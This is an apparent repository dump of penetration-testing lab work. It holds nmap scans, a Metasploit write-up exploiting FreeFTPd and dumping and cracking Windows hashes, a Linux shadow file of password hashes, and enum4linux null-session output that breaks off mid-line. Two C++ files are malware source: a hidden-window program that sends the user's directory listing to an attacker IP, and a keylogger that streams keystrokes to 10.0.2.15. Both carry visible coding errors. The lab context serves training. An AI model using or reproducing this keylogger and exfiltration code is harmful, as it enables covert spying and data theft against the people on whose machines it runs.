6$movXAzDc$E4sBocqFLzY9iif37.1VF4uuOr5QsI7ZwrnkTM.ITDebTuEc5od/87suR9fBPGuEm4HU4pUf324z3Pxb86Sk9/:16470:0:99999:7:::\nsven:$6$L2Ac90qT$4NWVht13koXx1Zewnoq.aqh7584NpDNToIa41Qqbc94hwitYtA5pXZF0ZwsKRUIQ4bf0Z.5Tm9Ue5BLbw1y/61:16470:0:99999:7:::\ngary:$6$mbC5nX5S$baJcUKoownjBSnz6/wuXNK75gvtKZ5dub4BZwpjP1YvgkjooQ8GRbZpR4fAo0zevFiGWONgHjDkLKYxDiYIST/:16470:0:99999:7:::\nbrett:$6$qd2dCjHj$6qWUTOIG5OmP5OcN3.cMfDr24ScByDakPNIrRZjZqcqaiHlBuFbGvDsGTIAPizkZGrIvuH7gnhAgt/hg3f9Gz/:16470:0:99999:7:::\nSecurity:$6$GPayTWXW$sSarI38ETnIzRUSXgEXambmN8FNcCuUiDqnMYeeKYzavwk0Pefw5VafzCG9jpgTnzaWrY1QlbpkNOy4c22yRu.:16470:0:99999:7:::\ntorvalds:$6$UdO6LNso$sIErGAh.8NWiPZyarP4EqM15zKLy8ZDT4C1HixADAOHJ8MojNHFAJa33jx9qpixPiUpgibhKJpKb4gY/YgjSx1:16470:0:99999:7:::\nnate:$6$cic0vUV.$/zZv9r8/5C8D7HkGlymqTr1t248kTvSScQfyxnYldFQPQplIbfrn2R61ZHu.t0ImjP38YyMzw1Wbftpg8p9Xf0:16470:0:99999:7:::\nlarry:$6$C1wU6KtA$XgPBkqQLm6j2QdkDfLNyyQC90Fck6.EKAKxwD0DVeHm2m8k3.r4yLB0.lqa741PXTOYpq.gZPt83GsQszfK0G1:16470:0:99999:7:::\nadrian:$6$.wQ4ogUx$xRH9xkYVsVAKswluFPaNZj0c/CxVyzpdBkQaZ1rpSU8IEzub91YTwTDrEJUvWnCL9K.Sfm81/lQhLY1VpbX8g1:16470:0:99999:7:::\ntest:$6$IKTyMZxA$C6g0kSQ7eWmmRQrB7jlFMvS4oPU48tE18sJKuPxX0QSl9QlOXwwY3U.2aTpalC3i6qcPbLSbjav0SjmlxplNp0:16470:0:99999:7:::\ntech:$6$OTt3okCG$lrKSF4KyxVZgWlJ3uGgBRmMkChdZ8hxHyPWXS2/a2Vlq129Zq3jCZVINrW9nRG20TNsqI0MN07e88jJTGVGjd1:16470:0:99999:7:::\nsomeone:$6$Zk8ylIKZ$rFllR3qlbmirrkgwRppG0HaV9ppHK0/jHWTVeqsX3oxFKjnzgg.DnS7CMXas151xCk51CmUV4dmeL17cJ3nIZ0:16470:0:99999:7:::\nkris:$6$MIsyuc0b$PcN7IMMSL7Fjla0C7IayevAuLD6iQmkvGX2rIxcx0VAGr7LACwtchRrE3AcZO5yTr3MQlZac9q2tvJcQjAUiF0:16470:0:99999:7:::\nandreas:$6$rsAbNhaA$CAbbNGghKugILQ6glWV0tEzeVbhoMB3S92Y155EHMaGeZsi6TpCIDVjw8aWlmWGIQAdB28OLQMKgWbYEAEz8x1:16470:0:99999:7:::\nakpm:$6$00w49s/D$wpRXPoKKRN4rNp11hIPCJ0v/C6BPpI.GZeihVlSfpvVd0s0zqglwb.blyf.hLsgrIbKwDI1s0Yvk6.FmArahS/:16470:0:99999:7:::\nstephen:$6$ssSU27er$LdCIfDEwxxrPHZLILJoBz3Zg.wWEaVgUfxf7pd8TQXtF4d1nOtIkUav2TMY1xrbyhCutzShgIkQTeopPCwlRg/:16470:0:99999:7:::\npassword:$6$hy0ECcK6$FdtsdPMLymN9GYJFaWsCq16yyMY05Whd41qODKrWpSmwR1QiiOPcUtLutMJtpWkDv/AqUivlU2NChCrUZMini0:16470:0:99999:7:::\noliver:$6$Iv.78Pvl$x4i0h9HyFfRo5mLan7JhSIS.5Yn7W5shQQpqHMC5ToXdUTWrUYDjgIZ1DtwTU4YRUh9O6QeR84k.i.4NSfX.51:16470:0:99999:7:::\nblaisorblade:$6$fI69BmWc$wrckcetwa5aKTbP0QZU7mJ3QD2yATRzag31BaCYUE0c/ESYNf1ivKrD/VsDY3D/PuIs1pup.VYm8OkwDnrUd6.:16470:0:99999:7:::\nroman:$6$pyat9UWx$t1ZZZGJ56DMNfl9IIWmT4DNeAQ1/RngqhGS232FytUAEtLn.duPbCoykRkfUiP2XrpV3V8Qh7wejTDsqyrXFq.:16470:0:99999:7:::\npostfix:$6$rMJQQZvk$EsTIxQbNZAgsETizbhaK/JUX0SAvWdXuVi0lNH1qI3kFy98e08XpH1c2fEOlCIlekhyymCiDVTP03Y/fo46pa.:16470:0:99999:7:::\nnathan:$6$t1nr6qNz$GdaeXW3DynadN54N9.XGO3F1VN0kWgxfnE7i/KaPM9Rv2FVEfZaJDNMqqrcrxtHjtxH8dHMIgnIviAlXejZI0.:16470:0:99999:7:::\nkarl:$6$2SjYTDHQ$or6fqbKAyWYmzj7yqQov/KWIeti459Y83WCgh3hp11cQdRhzLIyOjUo1tFn/vtZpWDb6Sc94T2CL5MgMcgb0Z/:16470:0:99999:7:::\njose:$6$q0dfDsFf$md83VAivCKQ0mKAt3iUhX5XyX2.mif0bdDm3qd/uu6pGPlFFdpHXiFiPrU3A5QfnksdVA.yMF2kqqARuBybmH/:16470:0:99999:7:::\nfeedback:$6$oxHD8GmD$kGMV8tRl31iptNlU3kLM7Z9vrqSTqosZtjHseV.bFuRhrD9ZYUjxgYabUL2CaQYq6kChznrdyg1hk.L9om0eQ1:16470:0:99999:7:::\ndev:$6$MDKxgwuE$vnvMEnKF/CwtqC60XEdqQO07UTrIVV0IxNoaMl3uGQy37Gh9Dl5jbg0bbAOBon2Uslmzy28AcyO7xJafdd5iw0:16470:0:99999:7:::\nbryan:$6$ZFlofYYU$aWT3Ig1t7xYYrkIdZb..EUaYUrwGzLSVaKhy5IJtvFTQAKUi4xf8Ek8IU2KQf6Hj9YJBY7fpuSKW052ct/qmI.:16470:0:99999:7:::\nbruce:$6$bKYubhwp$8VamLKD7r3OWbnqn79l3HsuBf5X8YAR2cq6s5.Tparz2GK2dGThKQTchJ3ZHTmCV7VsJdZzqXRHiknQU2gaDf0:16470:0:99999:7:::\nqmailr:$6$ewnv7baU$vgPT5H27mTC1LPskTQlmkWug1puAoIeEpWhWY65.PDOIXk09unASmKIpgYCTGIGUpXyg6Y04Sswqo2shldi30/:16470:0:99999:7:::\njamie:$6$hKrwJ2XL$K.VjPjTb0deFuo3YIhvypxHN9Wn952X2rIbhJ.t.5Gk9uO1vqt3NH5HEw2uPwPGMYSpuM4GzfXLEO9PKO2ZM//:16470:0:99999:7:::\nderek:$6$VRU46VG/$21FGTv71yuYyQ/7AtIzIqjV3GdHivvx7abiNlqe/QMffvF4NNAGRJ0cDL2eyWM2vPfIZZtcpn8P6XrcqqblYP/:16470:0:99999:7:::\nbrandon:$6$OsORtNZ.$1Jr.wOnm6EonOFjMu7utgFiv5VT.K2Fbt0JehTIevXHom.if0w3QBWeMvXJ0BZHeA8TleiCkcozae1KOBlbHX.:16470:0:99999:7:::\nrisks:$6$SoZjQEuS$Nxo6bfcqQGXW7Sj40Y/7OuG4KgKMzWROATWrJ6EfO9wk0FTqQXMv2Rx6Eml3p7i7s7YM/9S6wwA8hUtcQ9sRY0:16470:0:99999:7:::\nproberts:$6$ft8ebMmB$pZgSxqCWt9CxaAM7KrD9PTVJRVGFeAsm9mkWavvOYlErmnmYuo/qFYSLZ.jfgbfHEwq//nz67TK4MHRm6NemL0:16470:0:99999:7:::\npierre:$6$jhaog97C$XVbyU2iMF0Fj8qMg0.PryFkhVctz50UTCzmtSvgYIJKtEzvfJ5XQ.V5aiGph2IjMOaUhSL1eDO8.sYSQDydGZ/:16470:0:99999:7:::\npgo:$6$msJLJFAW$3yLybUn97UyvcxoV77JCoRS9IVcgPb5lMYNPgc2.bQKBrZvT3Qw48GroMnA.VPPdQlGHRKRL70bYDWa8HWJOX1:16470:0:99999:7:::\nmaxim:$6$v4qWXFNW$xvrxBZ8gfF7fsbGJ3V94dew9bajgsxI62Ew0jM0GK/EGRVQmT6sNpEbcYzVuSK8U6ziH7R7pqWwC9Uja7eF5X0:16470:0:99999:7:::\nguest:$6$6vAGLPss$5Ciwdq3qSTSTfgtrqZ.cY9SI5AtZwHN/MBqIEIhCOJcmXKDik7Je47JvyjeAng01AcfsjEMatE4tzusDIcEwU0:16475:0:99999:7:::\n" }, { "path": "ine-labs/dirbuster/alive_hosts.txt", "content": "10.104.11.50\n10.104.11.96\n10.104.11.198\n" }, { "path": "ine-labs/dirbuster/nmap_scan.txt", "content": "# Nmap 7.91 scan initiated Thu Feb 18 13:45:12 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt\nNmap scan report for 10.104.11.50\nHost is up (0.00026s latency).\nAll 1000 scanned ports on 10.104.11.50 are closed\n\nNmap scan report for 10.104.11.96\nHost is up (0.058s latency).\nNot shown: 998 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)\n80/tcp open http Apache httpd 2.2.22 ((Debian))\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nNmap scan report for 10.104.11.198\nHost is up (0.064s latency).\nNot shown: 998 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)\n3306/tcp open mysql MySQL 5.5.38-0+wheezy1\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n# Nmap done at Thu Feb 18 13:45:23 2021 -- 3 IP addresses (3 hosts up) scanned in 11.44 seconds\n" }, { "path": "ine-labs/exploit-based-cpp/exploit.cpp", "content": "#define _WINSOCK_DEPRECATED_NO_WARNINGS\n#pragma comment(lib, \"Ws2_32.lib\")\n\n#include \n#include \n#include \n#include \n#include \n#include \n\n#define ATTACKER_IP \"\"\n\nSOCKET InitServer()\n{\n\tShowWindow(GetConsoleWindow(), SW_HIDE);\n\tWSDATA wsaData;\n\tSOCKET server;\t\t// the socket to connect to\n\tSOCKADDR_IN addr;\t// holds connection details\n\tint result;\n\n\t// The WSAStartup function initiates use of the WS2_32.dll\n\tresult = WSAStartup(MAKEWORD(2, 0), &WSAData);\n\tif (result != 0) {\n\t\tprintf(\"WSAStartup failed with error code: %d\\n\", result);\n\t\texit(result);\n\t}\n\n\tserver = socket(AF_INET, SOCK_STREAM, 0);\t// establish TCP socket\n\n\t// manually add needed socket values; could instead use getaddrinfo()\n\taddr.sin_addr.s_addr = inet_addr(ATTACKER_IP);\n\taddr.sin_family = AF_INET;\n\taddr.sin_port = htons(5555);\n\n\tresult = connect(server, (SOCKADDR *)&addr, sizeof(addr));\n\n\tif (result = SOCKET_ERROR)\n\t\tserver = INVALID_SOCKET;\n\n\treturn server;\n}\n\nchar *GetUserDirectory()\n{\n\tchar *pPath = getenv(\"USERPROFILE\");\n\tif (pPath == NULL) {\n\t\tperror(\"getenv\");\n\t\texit(1);\n\t}\n\n\treturn pPath;\n}\n\nvoid SendData(SOCKET sockfd, char *buf)\n{\n\tint result = send(sockfd, buf, (int) strlen(buf), 0);\n\n\tif (result == SOCKET_ERROR) {\n\t\tprintf(\"send failed: %d\\n\", WSAGetLastError());\n\t\tclosesocket(server);\n\t\tWSACleanup();\n\t\texit(1);\n\t}\n}\n\nint SendUserDirectory(SOCKET sockfd, const char *dirname)\n{\n DIR *dirp;\n struct dirent *entry;\n\n dirp = opendir(dirname);\n\n errno = 0;\n\n while ((entry = readdir(dirp)) != NULL) {\n\tSendData(sockfd, entry->d_name, (int) strlen(entry->d_name), 0);\n }\n\n // When an error is encountered, a null pointer is returned and errno\n // is set to indicate the error. When the end of the directory\n // is encountered, a null pointer is returned and errno is not changed.\n return errno;\n}\n\n\nint main()\n{\n\tSOCKET server;\n\tchar *pPath = GetUserDirectory();\n\n\tserver = InitServer();\n\n\tif (server == INVALID_SOCKET) {\n\tprintf(\"Failed to connect!\\n\");\n\t\tclosesocket(server);\n\t\tWSACleanup();\n\t\treturn 1;\n\t}\n\n\tSendData(server, pPath);\n\n\tSendUserDirectory(server, pPath);\n\n\t// TODO error check\n\tclosesocket(server);\n\tWSACleanup();\n\n\treturn 0;\n}\n" }, { "path": "ine-labs/exploit-based-cpp/keylogger.cpp", "content": "#define _WINSOCK_DEPRECATED_NO_WARNINGS\n#pragma comment(lib, \"Ws2_32.lib\")\n\n#include \n#include \n#include \n#include \n\n#define ATTACKER_IP \"10.0.2.15\"\n\nint main()\n{\n ShowWindow(GetConsoleWindow(), SW_HIDE);\n char KEY;\n WSADATA WSAData;\n SOCKET server;\n SOCKADDR_IN addr;\n\n WSAStartup(MAKEWORD(2, 0), &WSAData);\n server = socket(AF_INET, SOCK_STREAM, 0);\n addr.sin_addr.s_addr = inet_addr(ATTACKER_IP)\n addr.sin_family = AF_INET;\n addr.sin_port = htons(5555);\n\n connect(server, (SOCKADDR *)&addr, sizeof(addr));\n\n // collect the pressed keys\n while (true) {\n\tSleep(10);\t// pause for 10 milliseconds\n\t// check if this is a printable key (keycodes defined by Microsoft)\n\tfor (int KEY = 0x8; KEY < 0xFF; KEY++) {\n\t if (GetAsyncKeyState(KEY) == -32767) {// if key was pressed\n\t \tchar buffer[2];\n\t\tbuffer[0] = KEY;\n\t\tsend(server, buffer, sizeof(buffer), 0);\n\t }\n\t}\n }\n\n // cleanup\n closesocket(server);\n WSACleanup();\n}\n" }, { "path": "ine-labs/metasploit/README.md", "content": "# Metasploit Lab\n\n## Description\n\nIn this lab, you will have to use Metasploit and meterpreter against a real\nmachine; this will help you become familiar with the Metasploit framework and\nits features.\n\n## Goals\n\n- Identify the target machine on the network\n- Find a vulnerable service\n- Exploit the service by using Metasploit to get a meterpreter session\n- Gather information from the machine by using meterpreter commands\n- Retrieve the password hashes from the exploit machine\n- Search for a file named \\\"Congrats.txt\\\"\n\n## Recon\n\nAfter connecting to the Hera Lab VPN, it is time to search for a vulnerable\ntarget. I used nmap for this:\n\n```\n $ nmap -sV -oN nmap_scan.txt 192.168.99.100/24 \n Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-23 12:43 EST\n Nmap scan report for 192.168.99.12\n Host is up (0.059s latency).\n Not shown: 994 closed ports\n PORT STATE SERVICE VERSION\n 21/tcp open ftp FreeFTPd 1.0\n 22/tcp open ssh WeOnlyDo sshd 2.1.8.98 (protocol 2.0)\n 135/tcp open msrpc Microsoft Windows RPC\n 139/tcp open netbios-ssn Microsoft Windows netbios-ssn\n 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds\n 3389/tcp open ms-wbt-server Microsoft Terminal Services\n Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, \n cpe:/o:microsoft:windows_xp\n\n```\n\nFrom the scan we see that the IP address 192.168.99.12 has several services\nrunning on it. Time to open up metasploit and determine which service is\nvulnerable for exploit.\n\n## Vulnerability Assessment\n\nSearching for the FreeFTPd service in msfconsole yields the following results:\n\n```\nmsf6 > search FreeFTPd 1.0\n\nMatching Modules\n================\n\n # Name Disclosure Date Rank Check Description\n - ---- --------------- ---- ----- -----------\n 0 exploit/windows/ftp/freeftpd_pass 2013-08-20 normal Yes freeFTPd PASS Command Buffer Overflow\n 1 exploit/windows/ftp/freeftpd_user 2005-11-16 average Yes freeFTPd 1.0 Username Overflow\n 2 exploit/windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow\n\n```\n\nI chose the first exploit since it has the most recent disclosure data and higher rank. I left the default\npayload as windows/meterpreter/reverse_tcp shell. \n\nThe only options we need to change are the remote and local hosts:\n\n```\nset RHOSTS 192.168.99.12\nset LHOST 192.168.99.100\n```\n\n\n## Exploitation\n \nRun the exploit to spawn a meterpreter session.\n\n### Cracking hashes\n\nOnce inside meterpreter, run the hashdump command:\n\n```\nmeterpreter> hashdump\nAdministrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::\neLSAdmin:1003:aad3b435b51404eeaad3b435b51404ee:87289513bddc269f9bcb24d74864beb2:::\nftp:1004:4ff1ab31fc4b0ebdaad3b435b51404ee:9865c4bdcd9578a380297c5095e6c852:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nHelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d:::\nSUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8dbc0:::\n```\n\nI copied the output to a file named hashdump.txt and fed it to john:\n\n```\n$ john hashdump.txt\n```\n\n### Escalate Privileges\n\nWe can escalate our privileges with the getsystem command:\n\n```\nmeterpreter > getsystem\n...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).\n\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM\n```\n\n### Print Congrats.txt\n\nThe Congrats.txt file can easily be found with the search command:\n\n```\nmeterpreter > search -f Congrats.txt\nFound 1 result...\n c:\\Documents and Settings\\eLSAdmin\\My Documents\\Congrats.txt (64 bytes)\nmeterpreter > cat \"c:\\Documents and Settings\\eLSAdmin\\My Documents\\Congrats.txt\"\n Congratulations! You have successfully exploited this machine!\n```\n\n## Install a Backdoor\n\n\n" }, { "path": "ine-labs/metasploit/hashdump.txt", "content": "Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::\neLSAdmin:1003:aad3b435b51404eeaad3b435b51404ee:87289513bddc269f9bcb24d74864beb2:::\nftp:1004:4ff1ab31fc4b0ebdaad3b435b51404ee:9865c4bdcd9578a380297c5095e6c852:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nHelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d:::\nSUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8dbc0:::\n" }, { "path": "ine-labs/metasploit/nmap_scan.txt", "content": "# Nmap 7.91 scan initiated Tue Feb 23 12:43:57 2021 as: nmap -sV -oN nmap_scan.txt 192.168.99.100/24\nNmap scan report for 192.168.99.12\nHost is up (0.059s latency).\nNot shown: 994 closed ports\nPORT STATE SERVICE VERSION\n21/tcp open ftp FreeFTPd 1.0\n22/tcp open ssh WeOnlyDo sshd 2.1.8.98 (protocol 2.0)\n135/tcp open msrpc Microsoft Windows RPC\n139/tcp open netbios-ssn Microsoft Windows netbios-ssn\n445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds\n3389/tcp open ms-wbt-server Microsoft Terminal Services\nService Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp\n\nNmap scan report for 192.168.99.100\nHost is up (0.00030s latency).\nAll 1000 scanned ports on 192.168.99.100 are closed\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n# Nmap done at Tue Feb 23 12:44:13 2021 -- 256 IP addresses (2 hosts up) scanned in 15.93 seconds\n" }, { "path": "ine-labs/nessus/nmap_scan.txt", "content": "# Nmap 7.91 scan initiated Thu Feb 18 12:17:44 2021 as: nmap -A -oN nmap_scan.txt 192.168.99.70/24\nNmap scan report for 192.168.99.50\nHost is up (0.055s latency).\nNot shown: 997 closed ports\nPORT STATE SERVICE VERSION\n135/tcp open msrpc Microsoft Windows RPC\n139/tcp open netbios-ssn Microsoft Windows netbios-ssn\n445/tcp open microsoft-ds Windows XP microsoft-ds\nMAC Address: 00:50:56:A2:64:C8 (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/18%OT=135%CT=1%CU=40956%PV=Y%DS=1%DC=D%G=Y%M=005056%\nOS:TM=602EA184%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=I%CI=I%II=\nOS:I%SS=S%TS=0)OPS(O1=M4E7NW0NNT00NNS%O2=M4E7NW0NNT00NNS%O3=M4E7NW0NNT00%O4\nOS:=M4E7NW0NNT00NNS%O5=M4E7NW0NNT00NNS%O6=M4E7NNT00NNS)WIN(W1=FFFF%W2=FFFF%\nOS:W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M4E7NW0NNS%CC\nOS:=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=\nOS:S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FFFF%S=O%A=S+%F=AS%O=M4E7NW0NNT00NN\nOS:S%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W\nOS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)\nOS:T7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=B0%UN\nOS:=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z)\n\nNetwork Distance: 1 hop\nService Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp\n\nHost script results:\n|_clock-skew: mean: 4h08m16s, deviation: 5h39m25s, median: 8m15s\n|_nbstat: NetBIOS name: ELS-WINXP, NetBIOS user: , NetBIOS MAC: 00:50:56:a2:64:c8 (VMware)\n| smb-os-discovery: \n| OS: Windows XP (Windows 2000 LAN Manager)\n| OS CPE: cpe:/o:microsoft:windows_xp::-\n| Computer name: els-winxp\n| NetBIOS computer name: ELS-WINXP\\x00\n| Workgroup: WORKGROUP\\x00\n|_ System time: 2021-02-18T09:26:26-08:00\n| smb-security-mode: \n| account_used: guest\n| authentication_level: user\n| challenge_response: supported\n|_ message_signing: disabled (dangerous, but default)\n|_smb2-time: Protocol negotiation failed (SMB2)\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 54.90 ms 192.168.99.50\n\nNmap scan report for 192.168.99.70\nHost is up (0.000048s latency).\nAll 1000 scanned ports on 192.168.99.70 are closed\nToo many fingerprints match this host to give specific OS details\nNetwork Distance: 0 hops\n\nOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n# Nmap done at Thu Feb 18 12:19:02 2021 -- 256 IP addresses (2 hosts up) scanned in 78.85 seconds\n" }, { "path": "ine-labs/null-session/Congratulations.txt", "content": "Congratulations! You have successfully exploited a null session!\r\n" }, { "path": "ine-labs/null-session/alive_hosts.txt", "content": "192.168.99.100\n192.168.99.162\n" }, { "path": "ine-labs/null-session/enum4linux_scan.txt", "content": "Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 21 17:22:35 2021\n\n ========================== \n| Target Information |\n ========================== \nTarget ........... 192.168.99.162\nRID Range ........ 500-550,1000-1050\nUsername ......... ''\nPassword ......... ''\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n\n ====================================================== \n| Enumerating Workgroup/Domain on 192.168.99.162 |\n ====================================================== \n[+] Got domain/workgroup name: WORKGROUP\n\n ============================================== \n| Nbtstat Information for 192.168.99.162 |\n ============================================== \nLooking up status of 192.168.99.162\n\tELS-WINXP <00> - B Workstation Service\n\tWORKGROUP <00> - B Domain/Workgroup Name\n\tELS-WINXP <20> - B File Server Service\n\tWORKGROUP <1e> - B Browser Service Elections\n\tWORKGROUP <1d> - B Master Browser\n\t..__MSBROWSE__. <01> - B Master Browser\n\n\tMAC Address = 00-50-56-A0-46-C7\n\n ======================================= \n| Session Check on 192.168.99.162 |\n ======================================= \n[+] Server 192.168.99.162 allows sessions using username '', password ''\n\n ============================================= \n| Getting domain SID for 192.168.99.162 |\n ============================================= \nDomain Name: WORKGROUP\nDomain Sid: (NULL SID)\n[+] Can't determine if host is part of domain or part of a workgroup\n\n ======================================== \n| OS information on 192.168.99.162 |\n ======================================== \n[+] Got OS info for 192.168.99.162 from smbclient: \n[+] Got OS info for 192.168.99.162 from srvinfo:\n\t192.168.99.162 Wk Sv NT PtB LMB \n\tplatform_id :\t500\n\tos version :\t5.1\n\tserver type :\t0x51003\n\n =============================== \n| Users on 192.168.99.162 |\n =============================== \nindex: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator\tName: (null)\tDesc: Built-in account for administering the computer/domain\nindex: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS\tName: (null)\tDesc: (null)\nindex: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank\tName: Frank\tDesc: (null)\nindex: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest\tName: (null)\tDesc: Built-in account for guest access to the computer/domain\nindex: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant\tName: Remote Desktop Help Assistant Account\tDesc: Account for Providing Remote Assistance\nindex: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin\tName: netadmin\tDesc: (null)\nindex: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0\tName: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US\tDesc: This is a vendor's account for the Help and Support Service\n\nuser:[Administrator] rid:[0x1f4]\nuser:[eLS] rid:[0x3eb]\nuser:[Frank] rid:[0x3ed]\nuser:[Guest] rid:[0x1f5]\nuser:[HelpAssistant] rid:[0x3e8]\nuser:[netadmin] rid:[0x3ec]\nuser:[SUPPORT_388945a0] rid:[0x3ea]\n\n =========================================== \n| Share Enumeration on 192.168.99.162 |\n =========================================== \n\n\tSharename Type Comment\n\t--------- ---- -------\n\tMy Documents Disk \n\tIPC$ IPC Remote IPC\n\tFrank Disk \n\tC Disk \n\tWorkSharing Disk \n\tFrankDocs Disk \n\tADMIN$ Disk Remote Admin\n\tC$ Disk Default share\nReconnecting with SMB1 for workgroup listing.\n\n\tServer Comment\n\t--------- -------\n\n\tWorkgroup Master\n\t--------- -------\n\n[+] Attempting to map shares on 192.168.99.162\n//192.168.99.162/IPC$\tMapping: OK\tListing: DENIED\n//192.168.99.162/Frank\tMapping: OK\tListing: DENIED\n//192.168.99.162/C\t[E] Can't understand response:\n AUTOEXEC.BAT A 0 Thu Feb 12 19:50:47 2015\n boot.ini HS 211 Thu Feb 12 19:46:17 2015\n CONFIG.SYS A 0 Thu Feb 12 19:50:47 2015\n Documents and Settings D 0 Wed Feb 18 04:25:58 2015\n IO.SYS AHSR 0 Thu Feb 12 19:50:47 2015\n MSDOS.SYS AHSR 0 Thu Feb 12 19:50:47 2015\n NTDETECT.COM AHSR 47564 Tue Aug 3 13:08:34 2004\n ntldr AHSR 250032 Tue Aug 3 13:29:34 2004\n pagefile.sys AHS 805306368 Sun Feb 21 23:01:08 2021\n Program Files DR 0 Mon Oct 3 12:10:27 2016\n System Volume Information DHS 0 Thu Feb 12 19:54:12 2015\n WINDOWS D 0 Mon Oct 3 12:12:49 2016\n\n\t\t785224 blocks of size 4096. 304467 blocks available\n//192.168.99.162/WorkSharing\tMapping: OK, Listing: OK\n//192.168.99.162/FrankDocs\tMapping: OK\tListing: DENIED\n//192.168.99.162/ADMIN$\tMapping: DENIED, Listing: N/A\n//192.168.99.162/C$\tMapping: DENIED, Listing: N/A\n\n ====================================================== \n| Password Policy Information for 192.168.99.162 |\n ====================================================== \n\n\n[+] Attaching to 192.168.99.162 using a NULL share\n\n[+] Trying protocol 139/SMB...\n\n\t[!] Protocol failed: Cannot request session (Called Name:192.168.99.162)\n\n[+] Trying protocol 445/SMB...\n\n[+] Found domain(s):\n\n\t[+] ELS-WINXP\n\t[+] Builtin\n\n[+] Password Info for Domain: ELS-WINXP\n\n\t[+] Minimum password length: None\n\t[+] Password history length: None\n\t[+] Maximum password age: 42 days 22 hours 47 minutes \n\t[+] Password Complexity Flags: 000000\n\n\t\t[+] Domain Refuse Password Change: 0\n\t\t[+] Domain Password Store Cleartext: 0\n\t\t[+] Domain Password Lockout Admins: 0\n\t\t[+] Domain Password No Clear Change: 0\n\t\t[+] Domain Password No Anon Change: 0\n\t\t[+] Domain Password Complex: 0\n\n\t[+] Minimum password age: None\n\t[+] Reset Account Lockout Counter: 30 minutes \n\t[+] Locked Account Duration: 30 minutes \n\t[+] Account Lockout Threshold: None\n\t[+] Forced Log off Time: Not Set\n\n\n[+] Retieved partial password policy with rpcclient:\n\nPassword Complexity: Disabled\nMinimum Password Length: 0\n\n\n ================================ \n| Groups on 192.168.99.162 |\n ================================ \n\n[+] Getting builtin groups:\ngroup:[Administrators] rid:[0x220]\ngroup:[Backup Operators] rid:[0x227]\ngroup:[Guests] rid:[0x222]\ngroup:[Network Configuration Operators] rid:[0x22c]\ngroup:[Power Users] rid:[0x223]\ngroup:[Remote Desktop Users] rid:[0x22b]\ngroup:[Replicator] rid:[0x228]\ngroup:[Users] rid:[0x221]\n\n[+] Getting builtin group memberships:\nGroup 'Administrators' (RID: 544) has member: ELS-WINXP\\Administrator\nGroup 'Administrators' (RID: 544) has member: ELS-WINXP\\eLS\nGroup 'Administrators' (RID: 544) has member: ELS-WINXP\\netadmin\nGroup 'Users' (RID: 545) has member: NT AUTHORITY\\INTERACTIVE\nGroup 'Users' (RID: 545) has member: NT AUTHORITY\\Authenticated Users\nGroup 'Users' (RID: 545) has member: ELS-WINXP\\netadmin\nGroup 'Users' (RID: 545) has member: ELS-WINXP\\Frank\nGroup 'Guests' (RID: 